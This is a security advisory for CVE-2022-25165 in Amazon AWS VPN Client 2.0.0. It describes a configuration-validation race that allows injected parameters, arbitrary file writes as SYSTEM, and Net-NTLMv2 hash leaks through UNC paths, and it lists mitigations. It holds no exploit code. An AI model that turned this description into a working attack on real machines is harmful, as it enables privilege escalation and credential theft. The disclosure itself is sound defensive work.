CVE-2022-25165

Name of the Vulnerable Software and Affected Versions Amazon AWS VPN Client version 2.0.0

Description An issue exists in the Amazon AWS VPN Client, allowing parameters outside of the allow list to be injected into the configuration file. This can lead to an arbitrary file write as SYSTEM with partial control over the file's content, potentially causing an elevation of privilege or denial of service. A TOCTOU race condition exists during the validation of VPN configuration files, enabling dangerous arguments to be injected by a low-level user. For example, the log parameter can be used to specify an arbitrary destination for writing log files. Additionally, it is possible to include a UNC path in the OpenVPN configuration file, which can leak the user's Net-NTLMv2 hash to an external server when the client attempts to validate the file path.

Recommendations For Amazon AWS VPN Client version 2.0.0, consider disabling the log parameter in the configuration file to prevent arbitrary file writes until a patch is available. Restrict access to the configuration file to minimize the risk of exploitation. Avoid using the auth-user-pass parameter with UNC paths in the OpenVPN configuration file until the issue is resolved. As a temporary workaround, monitor the configuration file for any changes and remove any malicious directives. At the moment, there is no information about a newer version that contains a fix for this vulnerability.